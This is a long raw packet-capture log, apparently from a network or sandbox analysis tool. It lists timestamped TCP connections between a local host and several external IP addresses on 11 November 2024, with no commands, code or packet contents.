                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836132050 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836142063 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836152077 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836162090 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836172104 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836183071 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836193085 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836203098 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836213112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836304903 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836427927 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836441040 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836451054 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836461067 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836487055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836497068 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836507082 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836517096 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836527109 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836536884 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836546898 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836556911 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836566925 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836575985 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836585999 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836591005 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836596012 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836606979 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836616993 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836627960 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836637020 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836647034 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836735964 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836803913 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836807013 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836807966 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836807966 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836808920 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836808920 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836810112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836810112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836811066 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836811066 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.836812019 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.837363958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.837363958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.837363958 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841154099 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841267109 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841289043 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841300011 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841310978 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.841320992 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.842057943 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.853431940 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039284945 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039305925 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039506912 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039555073 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039587021 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039602041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039633989 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039649010 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039676905 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039691925 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039705992 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039733887 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039747953 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039778948 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039794922 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039809942 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039810896 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039838076 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039853096 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039881945 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039896965 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039911985 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039940119 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.039961100 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040010929 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040031910 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040045977 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040060043 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040075064 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040088892 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040102959 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040117979 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040132046 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040146112 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040160894 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040174961 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040186882 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040189981 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040205002 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040220022 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040234089 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040247917 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040261984 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040277004 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040280104 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040291071 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040307045 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040328026 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040342093 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040355921 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040383101 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040397882 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040426016 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040441036 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040455103 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040482998 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040498018 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040514946 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040544033 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040559053 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040585995 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040608883 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040643930 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040658951 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040685892 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040700912 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040715933 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040730953 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040745020 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040760040 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040775061 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040788889 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040803909 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040817976 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040832996 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040839911 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040839911 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040839911 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040847063 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040862083 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040865898 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040875912 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040890932 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040904999 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040910959 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040919065 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040934086 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.040945053 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.041094065 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.041218042 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:59.060718060 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.352480888 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.352503061 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.352579117 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.570961952 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.571229935 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.571403027 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.791894913 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.802803993 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:01.802953959 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.194210052 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.194230080 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.194468021 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.194668055 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.194679976 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.352240086 CET49764443192.168.11.2023.1.33.206
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.688816071 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.690459013 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.690469980 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.691768885 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.692106009 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.693722963 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.693819046 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.693859100 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.736670971 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.736680984 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.783509970 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.892946959 CET4976380192.168.11.2064.233.176.94
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.892982960 CET4976580192.168.11.20199.232.214.172
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.893002033 CET4976680192.168.11.20199.232.214.172
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.924623966 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.924716949 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.924813032 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.924860954 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.924900055 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.924990892 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.925046921 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.925250053 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.933243036 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.943783045 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.943974972 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.943990946 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:04.988933086 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011332989 CET8049765199.232.214.172192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011347055 CET8049765199.232.214.172192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011356115 CET8049766199.232.214.172192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011365891 CET8049766199.232.214.172192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011374950 CET804976364.233.176.94192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011483908 CET4976580192.168.11.20199.232.214.172
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011513948 CET4976680192.168.11.20199.232.214.172
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.011749983 CET4976380192.168.11.2064.233.176.94
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.045631886 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.049679041 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.049705029 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.050012112 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.050026894 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.050204992 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.056277037 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.066193104 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.066236973 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.066586018 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.066603899 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.066900015 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.073178053 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.081578016 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.081604004 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.081809044 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.081828117 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.082016945 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.090131998 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.098432064 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.098469019 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.098670006 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.098689079 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.098892927 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.106827021 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.115437031 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.115458965 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.115652084 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.115664005 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.115865946 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.123569012 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.131928921 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.131952047 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.132213116 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.132224083 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.132390022 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.163996935 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.167937040 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.167968035 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.168200016 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.168207884 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.168418884 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.175430059 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.182670116 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.182760000 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.183015108 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.183058977 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.183305025 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.189135075 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.195924044 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196052074 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196129084 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196176052 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.196424007 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.202553988 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.208743095 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.208831072 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.208978891 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.209024906 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.209301949 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.215306997 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.221872091 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.221996069 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.222138882 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.222183943 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.222502947 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.228830099 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.234942913 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235059023 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235198975 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235244036 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.235465050 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.241452932 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249063015 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249180079 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249330044 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249376059 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.249629974 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.254386902 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.260828972 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.260974884 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.261089087 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.261121035 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.261311054 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.266880035 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272550106 CET44349781172.217.215.132192.168.11.20
